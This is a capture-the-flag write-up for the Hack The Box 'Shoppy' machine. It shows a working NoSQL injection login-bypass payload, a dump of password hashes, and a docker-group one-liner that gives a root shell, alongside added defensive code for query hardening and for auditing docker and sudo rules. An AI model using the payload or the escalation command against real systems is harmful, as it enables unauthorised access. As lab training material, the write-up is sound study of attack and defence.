CREATE & DESTROY

Shoppy | Hack The Box

22/tcp   open  ssh
80/tcp   open  http
9093/tcp open  copycat

A few ports open, we’ll start with the web server.

Nothing immediately interesting but a quick directory enumeration takes us to a login page.

While fuzzing for subdomains I find mattermost.shoppy.htb, but I am convinced it's a rabbit hole, so I will leave it for now and return to the main index.

After spending quite some time on Shoppy's login form I discover it's vulnerable to NoSQL injection (NoSQLi). Using the payload admin'||'1'==' lets us bypass straight into the admin portal.

Entering exactly the same payload into the user search box returns usernames and password hashes; Josh's hash cracks quickly.

_id	"62db0e93d6d6a999a66ee67a"
username	"admin"
password	"23c6877d9e2b564ef8b32c3a23de27b2"
_id	"62db0e93d6d6a999a66ee67b"
username	"josh"
password	"6ebcea65320589ca4f2f1ce039975995"
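As an added illustration (this is not Shoppy's source, which I have not seen), the snippet below shows the query pattern that a payload like admin'||'1'==' exploits, next to the form that is immune to it. It assumes a Node application querying a MongoDB users collection of {username, password} documents, with a password hash compared server-side; the user record, the wrong-password hash and the helper names are all constructed for the example.

```javascript
// Added example (not Shoppy's code): a string-built MongoDB $where clause
// beside the equality-filter form that does not execute user input.
// Assumed: a users collection of {username, password} documents, password
// being the hex digest shown in the write-up's dump.

// Constructed user record; the hash is copied from the write-up's dump.
const ADMIN_DOC = { username: 'admin', password: '23c6877d9e2b564ef8b32c3a23de27b2' };

// VULNERABLE: the handler concatenates untrusted input into a JavaScript
// expression destined for a $where clause. A quote in `username` closes the
// string literal and the remainder of the input is parsed as code.
function unsafeWhereClause(username, passwordHash) {
  return "this.username == '" + username + "' && this.password == '" + passwordHash + "'";
}

// Stand-in for the server-side evaluation MongoDB performs for $where:
// the clause runs as JavaScript with `this` bound to each document.
function evaluateWhere(clause, doc) {
  return Boolean(new Function('return (' + clause + ');').call(doc));
}

// HARDENED: a plain equality filter. The driver serialises the values as BSON
// strings, so quotes and operators inside them are only characters. String()
// also defeats object-shaped payloads such as {"$ne": ""} sent as JSON.
function safeFilter(username, passwordHash) {
  return { username: String(username), password: String(passwordHash) };
}

// Stand-in for the equality match the database performs for such a filter.
function matchesFilter(filter, doc) {
  return Object.keys(filter).every((k) => doc[k] === filter[k]);
}

// Input validation / detection: a username for this application is a bare
// identifier. Anything else is rejected (and worth logging) before any query
// is built, which catches the write-up's payload on its quote and pipes.
const USERNAME_RE = /^[a-z0-9_.-]{1,32}$/i;
function isSuspiciousUsername(value) {
  return typeof value !== 'string' || !USERNAME_RE.test(value);
}

// A candidate hash that does NOT match ADMIN_DOC (constructed).
const WRONG_HASH = '0'.repeat(32);
// The payload from the write-up.
const PAYLOAD = "admin'||'1'=='";

// Returns the outcome of each path for the same wrong-password attempt.
function demo() {
  return {
    // '||' short-circuits on the username comparison, so the password is never checked
    vulnerableBypass: evaluateWhere(unsafeWhereClause(PAYLOAD, WRONG_HASH), ADMIN_DOC),
    // the payload is compared as a literal username and matches nothing
    hardenedBypass: matchesFilter(safeFilter(PAYLOAD, WRONG_HASH), ADMIN_DOC),
    flaggedByValidator: isSuspiciousUsername(PAYLOAD),
    legitimateLogin: matchesFilter(safeFilter('admin', ADMIN_DOC.password), ADMIN_DOC),
  };
}
```

The operator precedence is the whole story: inside the built clause, && binds tighter than ||, so the expression becomes "username matches admin, OR (something false AND the password check)", and the password comparison is never reached for an existing account. The equality filter never turns input into an expression, and the validator gives you a log line to alert on.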

These creds don't get us into SSH, but remembering the subdomain we found earlier, I am able to log in to Mattermost as josh.

Inside one of the chats we find credentials that do log us in over SSH.

jaeger@shoppy:~/ShoppyApp$ sudo -l
[sudo] password for jaeger:
Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager

Seeing we can run password-manager as another user I’ll have a try.

It prompts for a password, so I check back in the Mattermost chat. Josh mentions working on a C++ password manager, so I download the binary locally and have a look at the code in Ghidra.

We can see here that the password manager is looking only for the string “Sample”.

Now we get to move into a new user!

Our new account can't run anything via sudo, but it is a member of the docker group, which means we should be able to pop into a root shell with a simple one-liner…

deploy@shoppy:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)

So now we can grab the root flag and the box is done.
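From the defending side, both hops on this box (a sudo rule pointing at a binary in another user's home, and docker group membership) are visible in two files worth auditing. The script below is an added example, not something from the box or the write-up: it parses a constructed /etc/group excerpt and a constructed copy of the sudo -l output above and flags both conditions. Group ids, the group list and the function names are assumptions of the example; on a real host you would feed it the actual files.

```javascript
// Added example (not from the write-up): flag docker-group membership and
// sudo rules that run a binary out of a home directory. All input is
// constructed inline so the script runs offline.

// Groups whose membership deserves review: docker and lxd hand out root via
// a container bind-mount, disk gives raw device access, sudo/wheel depend on
// the sudoers rules themselves.
const GROUPS_TO_REVIEW = new Set(['docker', 'lxd', 'disk', 'sudo', 'wheel']);

// Constructed /etc/group excerpt (user names mirror the write-up; gids are made up).
const GROUP_FILE = `root:x:0:
sudo:x:27:
docker:x:998:deploy
jaeger:x:1000:
deploy:x:1001:
`;

// Constructed copy of the `sudo -l` output shown above, trimmed to what the parser needs.
const SUDO_L = `Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager
`;

// /etc/group lines are name:password:gid:member,member ; returns {name: [members]}.
function parseGroupFile(text) {
  const groups = {};
  for (const line of text.split('\n')) {
    if (!line.trim()) continue;
    const [name, , , members = ''] = line.split(':');
    groups[name] = members ? members.split(',') : [];
  }
  return groups;
}

// Every (user, group) pair where the group is on the review list.
function findGroupMembersToReview(text) {
  const groups = parseGroupFile(text);
  const findings = [];
  for (const g of GROUPS_TO_REVIEW) {
    for (const user of groups[g] || []) findings.push({ user, group: g });
  }
  return findings;
}

// Matches the "(runas) [TAG:] command" lines of `sudo -l`.
const RULE_RE = /^\s*\((?<runas>[^)]+)\)\s*(?<tags>(?:\w+:\s*)*)(?<cmd>\S.*)$/;

// A command under /home is owned and editable by that home's user, so a rule
// that runs it as someone else is only as trustworthy as that user's account.
function auditSudoRules(text) {
  const findings = [];
  for (const line of text.split('\n')) {
    const m = RULE_RE.exec(line);
    if (!m) continue;
    const { runas, tags, cmd } = m.groups;
    const reasons = [];
    if (cmd.trim().startsWith('/home/')) reasons.push('command lives in a home directory');
    if (/NOPASSWD:/.test(tags)) reasons.push('no password required');
    findings.push({ runas: runas.trim(), cmd: cmd.trim(), reasons });
  }
  return findings;
}

// Run against the constructed input; prints one line per finding.
for (const f of findGroupMembersToReview(GROUP_FILE)) {
  console.log(`group ${f.group}: member ${f.user}`);
}
for (const r of auditSudoRules(SUDO_L)) {
  console.log(`sudo: (${r.runas}) ${r.cmd} ${r.reasons.length ? '[' + r.reasons.join('; ') + ']' : ''}`);
}
```

The docker finding is the one that matters most: anyone in that group can start a container with the host filesystem mounted, which is exactly the one-liner above, so membership should be treated as equivalent to root and granted accordingly.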

A great room; I enjoyed that there wasn't one hard sticking point. It took me a while to get the NoSQLi payload right.
